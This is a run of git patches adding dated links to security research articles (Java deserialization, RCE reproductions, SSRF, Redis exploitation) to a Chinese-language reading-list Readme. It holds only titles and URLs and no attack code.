@@ -297,3 +297,4 @@ + 2023/03/15 [永恒之蓝Windows10版踩坑复现](https://mp.weixin.qq.com/s/H8cOsXmH0EzDPEBsPgvMrg) + 2023/03/17 [老洞新绕](https://mp.weixin.qq.com/s/V1MWq8NBkSDjTBY4AiW6Pw) **tomcat 路径特性和Axis特性** + 2023/03/17 [Spring Boot 如果防护 XSS + SQL 注入攻击 ?一文带你搞定!](https://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjghttps://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjg) ++ 2023/03/19 [Django下防御Race Condition漏洞](https://mp.weixin.qq.com/s/9f5Hxoyw5ne8IcYx4uwwvQ) From 0d43bc7ef57d10776b06583692dbba4093953358 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 23 Mar 2023 21:11:49 +0800 Subject: [PATCH 233/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 898ef28..ee3471a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -298,3 +298,4 @@ + 2023/03/17 [老洞新绕](https://mp.weixin.qq.com/s/V1MWq8NBkSDjTBY4AiW6Pw) **tomcat 路径特性和Axis特性** + 2023/03/17 [Spring Boot 如果防护 XSS + SQL 注入攻击 ?一文带你搞定!](https://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjghttps://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjg) + 2023/03/19 [Django下防御Race Condition漏洞](https://mp.weixin.qq.com/s/9f5Hxoyw5ne8IcYx4uwwvQ) ++ 2023/03/23 [redis未授权到shiro反序列化](https://xz.aliyun.com/t/11198) 在shiro中不错,可以尝试找其他触发点,基本上在数据库的操作上 From c291cec664f149a2fb45451db3d479f000046eb5 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 24 Mar 2023 12:45:48 +0800 Subject: [PATCH 234/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ee3471a..7781424 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -299,3 +299,4 @@ + 2023/03/17 [Spring Boot 如果防护 XSS + SQL 注入攻击 ?一文带你搞定!](https://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjghttps://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjg) + 2023/03/19 [Django下防御Race Condition漏洞](https://mp.weixin.qq.com/s/9f5Hxoyw5ne8IcYx4uwwvQ) + 2023/03/23 [redis未授权到shiro反序列化](https://xz.aliyun.com/t/11198) 在shiro中不错,可以尝试找其他触发点,基本上在数据库的操作上 ++ 2023/03/24 [Flink RCE via jar/plan API Endpoint in JDK8](https://mp.weixin.qq.com/s?srcid=0324U8WlT7MpOqTIt0vM2MJD&scene=23&sharer_sharetime=1679630653991&mid=2247495227&sharer_shareid=33fdea7abe6be586e131951d667ccd06&sn=5ab9bcc3d89d57ff9799f88c3363814c&idx=1&__biz=MzkyNDA5NjgyMg%3D%3D&chksm=c1d9ae62f6ae2774dd25902c116f6c24f3e5bbf68836f676c25aac53f2c6b771b4a3823c3e7e&mpshare=1#rd) **hessian的利用** From 24304a9f545ebf842434f36cacb1220c48c18fea Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 26 Mar 2023 23:25:59 +0800 Subject: [PATCH 235/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 7781424..bfe30ae 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -300,3 +300,4 @@ + 2023/03/19 [Django下防御Race Condition漏洞](https://mp.weixin.qq.com/s/9f5Hxoyw5ne8IcYx4uwwvQ) + 2023/03/23 [redis未授权到shiro反序列化](https://xz.aliyun.com/t/11198) 在shiro中不错,可以尝试找其他触发点,基本上在数据库的操作上 + 2023/03/24 [Flink RCE via jar/plan API Endpoint in JDK8](https://mp.weixin.qq.com/s?srcid=0324U8WlT7MpOqTIt0vM2MJD&scene=23&sharer_sharetime=1679630653991&mid=2247495227&sharer_shareid=33fdea7abe6be586e131951d667ccd06&sn=5ab9bcc3d89d57ff9799f88c3363814c&idx=1&__biz=MzkyNDA5NjgyMg%3D%3D&chksm=c1d9ae62f6ae2774dd25902c116f6c24f3e5bbf68836f676c25aac53f2c6b771b4a3823c3e7e&mpshare=1#rd) **hessian的利用** ++ 2023/03/26 [公开一个macOS命令执行技巧](https://mp.weixin.qq.com/s/GZ5eS_lHiBBb7jHNu6PUgg) **因为自己在使用了** 
From 9af26cc993bddda3ccc2a202e6f9b0e22d765470 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 27 Mar 2023 19:54:03 +0800 Subject: [PATCH 236/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index bfe30ae..6a21d12 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -301,3 +301,4 @@ + 2023/03/23 [redis未授权到shiro反序列化](https://xz.aliyun.com/t/11198) 在shiro中不错,可以尝试找其他触发点,基本上在数据库的操作上 + 2023/03/24 [Flink RCE via jar/plan API Endpoint in JDK8](https://mp.weixin.qq.com/s?srcid=0324U8WlT7MpOqTIt0vM2MJD&scene=23&sharer_sharetime=1679630653991&mid=2247495227&sharer_shareid=33fdea7abe6be586e131951d667ccd06&sn=5ab9bcc3d89d57ff9799f88c3363814c&idx=1&__biz=MzkyNDA5NjgyMg%3D%3D&chksm=c1d9ae62f6ae2774dd25902c116f6c24f3e5bbf68836f676c25aac53f2c6b771b4a3823c3e7e&mpshare=1#rd) **hessian的利用** + 2023/03/26 [公开一个macOS命令执行技巧](https://mp.weixin.qq.com/s/GZ5eS_lHiBBb7jHNu6PUgg) **因为自己在使用了** ++ 2023/03/27 [Exploiting memory corruption vulnerabilities on Android](https://blog.oversecured.com/Exploiting-memory-corruption-vulnerabilities-on-Android/) From 282f20b743e8af584e7c6c4f7c045de618cc54a6 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 29 Mar 2023 00:24:32 +0800 Subject: [PATCH 237/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 6a21d12..d96dcc5 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -302,3 +302,4 @@ + 2023/03/24 [Flink RCE via jar/plan API Endpoint in JDK8](https://mp.weixin.qq.com/s?srcid=0324U8WlT7MpOqTIt0vM2MJD&scene=23&sharer_sharetime=1679630653991&mid=2247495227&sharer_shareid=33fdea7abe6be586e131951d667ccd06&sn=5ab9bcc3d89d57ff9799f88c3363814c&idx=1&__biz=MzkyNDA5NjgyMg%3D%3D&chksm=c1d9ae62f6ae2774dd25902c116f6c24f3e5bbf68836f676c25aac53f2c6b771b4a3823c3e7e&mpshare=1#rd) **hessian的利用** + 2023/03/26 [公开一个macOS命令执行技巧](https://mp.weixin.qq.com/s/GZ5eS_lHiBBb7jHNu6PUgg) **因为自己在使用了** + 2023/03/27 [Exploiting memory corruption vulnerabilities on Android](https://blog.oversecured.com/Exploiting-memory-corruption-vulnerabilities-on-Android/) ++ 2023/03/29 [zeppelin 未授权任意命令执行漏洞复现](https://edu.hetianlab.com/post/94) From 20b5786ca9b869a15db0ec7a4f46909763ac2ac1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 31 Mar 2023 18:46:35 +0800 Subject: [PATCH 238/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index d96dcc5..334f5cb 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -303,3 +303,4 @@ + 2023/03/26 [公开一个macOS命令执行技巧](https://mp.weixin.qq.com/s/GZ5eS_lHiBBb7jHNu6PUgg) **因为自己在使用了** + 2023/03/27 [Exploiting memory corruption vulnerabilities on Android](https://blog.oversecured.com/Exploiting-memory-corruption-vulnerabilities-on-Android/) + 2023/03/29 [zeppelin 未授权任意命令执行漏洞复现](https://edu.hetianlab.com/post/94) ++ 2023/03/31 [SQL注入&预编译](https://forum.butian.net/share/1559) From 0cdb50a994eb55971dcaedb1465a83dd0d3d0443 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 31 Mar 2023 23:50:21 +0800 Subject: [PATCH 239/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 334f5cb..fbd35d5 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -303,4 +303,5 @@ + 2023/03/26 [公开一个macOS命令执行技巧](https://mp.weixin.qq.com/s/GZ5eS_lHiBBb7jHNu6PUgg) **因为自己在使用了** + 2023/03/27 [Exploiting memory corruption vulnerabilities on Android](https://blog.oversecured.com/Exploiting-memory-corruption-vulnerabilities-on-Android/) + 2023/03/29 [zeppelin 未授权任意命令执行漏洞复现](https://edu.hetianlab.com/post/94) -+ 2023/03/31 [SQL注入&预编译](https://forum.butian.net/share/1559) ++ 2023/03/31 [SQL注入&预编译](https://forum.butian.net/share/1559) ++ 2023/03/31 [The curl quirk that exposed Burp Suite & Google Chrome](https://portswigger.net/research/the-curl-quirk-that-exposed-burp-suite-amp-google-chrome) **@的问题** From f1466e40c539bf66fbeee93a55d257fa9072de71 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 2 Apr 2023 12:36:47 +0800 Subject: [PATCH 240/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index fbd35d5..20f0e65 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -305,3 +305,4 @@ + 2023/03/29 [zeppelin 未授权任意命令执行漏洞复现](https://edu.hetianlab.com/post/94) + 2023/03/31 [SQL注入&预编译](https://forum.butian.net/share/1559) + 2023/03/31 [The curl quirk that exposed Burp Suite & Google Chrome](https://portswigger.net/research/the-curl-quirk-that-exposed-burp-suite-amp-google-chrome) **@的问题** ++ 2023/04/02 [日志库logback的攻击路径](https://mp.weixin.qq.com/s/OBwxaijYCjnvo8I0OBusug) From 107eef4293456b781659d8cf19b02e8828a481cf Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 2 Apr 2023 13:52:56 +0800 Subject: [PATCH 241/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 20f0e65..8a312d9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -306,3 +306,4 @@ + 2023/03/31 [SQL注入&预编译](https://forum.butian.net/share/1559) + 2023/03/31 [The curl quirk that exposed Burp Suite & Google Chrome](https://portswigger.net/research/the-curl-quirk-that-exposed-burp-suite-amp-google-chrome) **@的问题** + 2023/04/02 [日志库logback的攻击路径](https://mp.weixin.qq.com/s/OBwxaijYCjnvo8I0OBusug) ++ 2023/04/03 [SSRF payloads](https://pravinponnusamy.medium.com/ssrf-payloads-f09b2a86a8b4) From a43e1358829651bf2ebb0cf4c5db9a3f9bec5ef8 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 2 Apr 2023 17:08:47 +0800 Subject: [PATCH 242/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 8a312d9..ee9b659 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -306,4 +306,5 @@ + 2023/03/31 [SQL注入&预编译](https://forum.butian.net/share/1559) + 2023/03/31 [The curl quirk that exposed Burp Suite & Google Chrome](https://portswigger.net/research/the-curl-quirk-that-exposed-burp-suite-amp-google-chrome) **@的问题** + 2023/04/02 [日志库logback的攻击路径](https://mp.weixin.qq.com/s/OBwxaijYCjnvo8I0OBusug) -+ 2023/04/03 [SSRF payloads](https://pravinponnusamy.medium.com/ssrf-payloads-f09b2a86a8b4) ++ 2023/04/02 [SSRF payloads](https://pravinponnusamy.medium.com/ssrf-payloads-f09b2a86a8b4) ++ 2023/04/02 [DFA敏感词算法](https://mp.weixin.qq.com/s?__biz=MzU1ODcxNDgyMA==&mid=2247484121&idx=1&sn=2f1f40f73124aca46f6572f5235d945a&chksm=fc231872cb549164a13f5f74ce43201390aaeada5f5f897537c3999af583aac184f1ce81d504&mpshare=1&scene=23&srcid=0402QW1pkeLvwamFjHBi3hvz&sharer_sharetime=1680424676004&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 2e42e80cbf7c52818c6e849f70ae62818f16fc6d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 12 Apr 2023 21:12:29 +0800 Subject: [PATCH 243/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ee9b659..e4eb71e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -308,3 +308,4 @@ + 2023/04/02 [日志库logback的攻击路径](https://mp.weixin.qq.com/s/OBwxaijYCjnvo8I0OBusug) + 2023/04/02 [SSRF payloads](https://pravinponnusamy.medium.com/ssrf-payloads-f09b2a86a8b4) + 2023/04/02 [DFA敏感词算法](https://mp.weixin.qq.com/s?__biz=MzU1ODcxNDgyMA==&mid=2247484121&idx=1&sn=2f1f40f73124aca46f6572f5235d945a&chksm=fc231872cb549164a13f5f74ce43201390aaeada5f5f897537c3999af583aac184f1ce81d504&mpshare=1&scene=23&srcid=0402QW1pkeLvwamFjHBi3hvz&sharer_sharetime=1680424676004&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/04/12 [java-exploitation-restrictions-in](https://codewhitesec.blogspot.com/2023/04/java-exploitation-restrictions-in.html) From b2830fa50e3777a76560e6c14a0a61a502380553 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 15 Apr 2023 18:12:17 +0800 Subject: [PATCH 244/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e4eb71e..86fa42c 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -309,3 +309,4 @@ + 2023/04/02 [SSRF payloads](https://pravinponnusamy.medium.com/ssrf-payloads-f09b2a86a8b4) + 2023/04/02 [DFA敏感词算法](https://mp.weixin.qq.com/s?__biz=MzU1ODcxNDgyMA==&mid=2247484121&idx=1&sn=2f1f40f73124aca46f6572f5235d945a&chksm=fc231872cb549164a13f5f74ce43201390aaeada5f5f897537c3999af583aac184f1ce81d504&mpshare=1&scene=23&srcid=0402QW1pkeLvwamFjHBi3hvz&sharer_sharetime=1680424676004&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/04/12 [java-exploitation-restrictions-in](https://codewhitesec.blogspot.com/2023/04/java-exploitation-restrictions-in.html) ++ 2023/04/15 [Apache Solr 9.1 RCE 分析 CNVD-2023-27598](https://blog.noah.360.net/apache-solr-rce/) **todo** From 090712fbe5fca9150b86a0cfc07ad8a55fcb8074 Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 19 Apr 2023 11:24:37 +0800 Subject: [PATCH 245/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 86fa42c..47b3a2d 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -310,3 +310,4 @@ + 2023/04/02 [DFA敏感词算法](https://mp.weixin.qq.com/s?__biz=MzU1ODcxNDgyMA==&mid=2247484121&idx=1&sn=2f1f40f73124aca46f6572f5235d945a&chksm=fc231872cb549164a13f5f74ce43201390aaeada5f5f897537c3999af583aac184f1ce81d504&mpshare=1&scene=23&srcid=0402QW1pkeLvwamFjHBi3hvz&sharer_sharetime=1680424676004&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/04/12 [java-exploitation-restrictions-in](https://codewhitesec.blogspot.com/2023/04/java-exploitation-restrictions-in.html) + 2023/04/15 [Apache Solr 9.1 RCE 分析 CNVD-2023-27598](https://blog.noah.360.net/apache-solr-rce/) **todo** ++ 2023/04/19 [RCE进入内网接管k8s并逃逸进xx网-实战科普教程(一)](https://mp.weixin.qq.com/s?__biz=MzIxNTIzMzM1Ng==&mid=2651106315&idx=1&sn=97e4337a8c5d95952ae44ddf358aa366&chksm=8c6b6a28bb1ce33e57b1985491e7375511a7e87be3a51bce751b94dacec2385a1477c4f89e24&mpshare=1&scene=23&srcid=0419GSbLma7eb91vWCxXAnsM&sharer_sharetime=1681872082937&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **学** From 0be06ea19db6c533e2ba5ee67a05652227ce0e20 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 31 May 2023 14:38:54 +0800 Subject: [PATCH 246/257] Create readme.md --- shell/Groovy/readme.md | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 shell/Groovy/readme.md diff --git a/shell/Groovy/readme.md b/shell/Groovy/readme.md new file mode 100644 index 0000000..1f20d18 --- /dev/null +++ b/shell/Groovy/readme.md @@ -0,0 +1,3 @@ +Groovy 安全 + +https://xz.aliyun.com/t/10703 
From f2a82c2f327caf4848ba9410eb07b0e49f1661c5 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 31 May 2023 15:16:29 +0800 Subject: [PATCH 247/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 47b3a2d..a960fd2 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -311,3 +311,4 @@ + 2023/04/12 [java-exploitation-restrictions-in](https://codewhitesec.blogspot.com/2023/04/java-exploitation-restrictions-in.html) + 2023/04/15 [Apache Solr 9.1 RCE 分析 CNVD-2023-27598](https://blog.noah.360.net/apache-solr-rce/) **todo** + 2023/04/19 [RCE进入内网接管k8s并逃逸进xx网-实战科普教程(一)](https://mp.weixin.qq.com/s?__biz=MzIxNTIzMzM1Ng==&mid=2651106315&idx=1&sn=97e4337a8c5d95952ae44ddf358aa366&chksm=8c6b6a28bb1ce33e57b1985491e7375511a7e87be3a51bce751b94dacec2385a1477c4f89e24&mpshare=1&scene=23&srcid=0419GSbLma7eb91vWCxXAnsM&sharer_sharetime=1681872082937&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **学** ++ 2023/05/31 [Nacos结合Spring Cloud Gateway RCE利用](https://xz.aliyun.com/t/11493) From ad71815b92bc5c81a674e479e2c35d817c1b96e3 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 3 Jun 2023 17:50:33 +0800 Subject: [PATCH 248/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a960fd2..dff0eb0 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -312,3 +312,4 @@ + 2023/04/15 [Apache Solr 9.1 RCE 分析 CNVD-2023-27598](https://blog.noah.360.net/apache-solr-rce/) **todo** + 2023/04/19 [RCE进入内网接管k8s并逃逸进xx网-实战科普教程(一)](https://mp.weixin.qq.com/s?__biz=MzIxNTIzMzM1Ng==&mid=2651106315&idx=1&sn=97e4337a8c5d95952ae44ddf358aa366&chksm=8c6b6a28bb1ce33e57b1985491e7375511a7e87be3a51bce751b94dacec2385a1477c4f89e24&mpshare=1&scene=23&srcid=0419GSbLma7eb91vWCxXAnsM&sharer_sharetime=1681872082937&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **学** + 2023/05/31 [Nacos结合Spring Cloud Gateway RCE利用](https://xz.aliyun.com/t/11493) ++ 2023/06/03 [Nevado JMS反序列化审计tips](https://novysodope.github.io/2023/04/01/95/) From 97f575a8c79e5c7f67afed23bced47ac87a00a64 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 3 Jun 2023 18:00:28 +0800 Subject: [PATCH 249/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index dff0eb0..f3df6af 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -313,3 +313,4 @@ + 2023/04/19 [RCE进入内网接管k8s并逃逸进xx网-实战科普教程(一)](https://mp.weixin.qq.com/s?__biz=MzIxNTIzMzM1Ng==&mid=2651106315&idx=1&sn=97e4337a8c5d95952ae44ddf358aa366&chksm=8c6b6a28bb1ce33e57b1985491e7375511a7e87be3a51bce751b94dacec2385a1477c4f89e24&mpshare=1&scene=23&srcid=0419GSbLma7eb91vWCxXAnsM&sharer_sharetime=1681872082937&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **学** + 2023/05/31 [Nacos结合Spring Cloud Gateway RCE利用](https://xz.aliyun.com/t/11493) + 2023/06/03 [Nevado JMS反序列化审计tips](https://novysodope.github.io/2023/04/01/95/) ++ 2023/06/03 [Celery Redis未授权访问利用](https://forum.butian.net/share/224) From 06320d964a19c67ad06305ce6f51a0b33a72bf1c Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 4 Jun 2023 14:16:47 +0800 Subject: [PATCH 250/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index f3df6af..71e1c71 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -314,3 +314,4 @@ + 2023/05/31 [Nacos结合Spring Cloud Gateway RCE利用](https://xz.aliyun.com/t/11493) + 2023/06/03 [Nevado JMS反序列化审计tips](https://novysodope.github.io/2023/04/01/95/) + 2023/06/03 [Celery Redis未授权访问利用](https://forum.butian.net/share/224) ++ 2023/06/04 [cname记录是什么?他存在的意义是什么?](https://www.zhihu.com/question/22916306) From 059a82feb5048cc0b23f611230a808caeb08ecb7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 5 Jun 2023 12:58:53 +0800 Subject: [PATCH 251/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 71e1c71..b0489dc 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -315,3 +315,4 @@ + 2023/06/03 [Nevado JMS反序列化审计tips](https://novysodope.github.io/2023/04/01/95/) + 2023/06/03 [Celery Redis未授权访问利用](https://forum.butian.net/share/224) + 2023/06/04 [cname记录是什么?他存在的意义是什么?](https://www.zhihu.com/question/22916306) ++ 2023/06/05 [ImageMagick 参数注入](https://github.com/ImageMagick/ImageMagick/issues/6338) From 62ea34e74a7a48e93f66684e295caa1c4210de04 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 5 Jun 2023 22:08:24 +0800 Subject: [PATCH 252/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b0489dc..5352177 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -316,3 +316,4 @@ + 2023/06/03 [Celery Redis未授权访问利用](https://forum.butian.net/share/224) + 2023/06/04 [cname记录是什么?他存在的意义是什么?](https://www.zhihu.com/question/22916306) + 2023/06/05 [ImageMagick 参数注入](https://github.com/ImageMagick/ImageMagick/issues/6338) ++ 2023/06/05 [为什么我们需要收集URL?](https://mp.weixin.qq.com/s/nhU9gbRot3X8D_1AvkirUA) From d481c3578b122a9bb8d7d24a3248889d1078eeef Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 6 Jun 2023 11:38:22 +0800 Subject: [PATCH 253/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 5352177..a075ebe 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -317,3 +317,4 @@ + 2023/06/04 [cname记录是什么?他存在的意义是什么?](https://www.zhihu.com/question/22916306) + 2023/06/05 [ImageMagick 参数注入](https://github.com/ImageMagick/ImageMagick/issues/6338) + 2023/06/05 [为什么我们需要收集URL?](https://mp.weixin.qq.com/s/nhU9gbRot3X8D_1AvkirUA) ++ 2023/06/06 [justCTF2023-AWS Cognito认证服务的安全隐患](https://hpdoger.cn/2023/06/05/title:%20justCTF2023-AWS%20Cognito%E8%AE%A4%E8%AF%81%E6%9C%8D%E5%8A%A1%E7%9A%84%E5%AE%89%E5%85%A8%E9%9A%90%E6%82%A3/) **学习** From f1260ae49ecb1bda1c91811608fef7c3f5e15e2c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 16 Jun 2023 21:25:27 +0800 Subject: [PATCH 254/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a075ebe..b4ac6f6 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -318,3 +318,4 @@ + 2023/06/05 [ImageMagick 参数注入](https://github.com/ImageMagick/ImageMagick/issues/6338) + 2023/06/05 [为什么我们需要收集URL?](https://mp.weixin.qq.com/s/nhU9gbRot3X8D_1AvkirUA) + 2023/06/06 [justCTF2023-AWS Cognito认证服务的安全隐患](https://hpdoger.cn/2023/06/05/title:%20justCTF2023-AWS%20Cognito%E8%AE%A4%E8%AF%81%E6%9C%8D%E5%8A%A1%E7%9A%84%E5%AE%89%E5%85%A8%E9%9A%90%E6%82%A3/) **学习** ++ 2023/06/16 [NGINX缓存原理及源码分析(一)](https://zhuanlan.zhihu.com/p/420983450) From ce6588308a2a340a77849833733c5fe65422f3a5 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 16 Jun 2023 21:29:01 +0800 Subject: [PATCH 255/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b4ac6f6..30e3f6b 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ 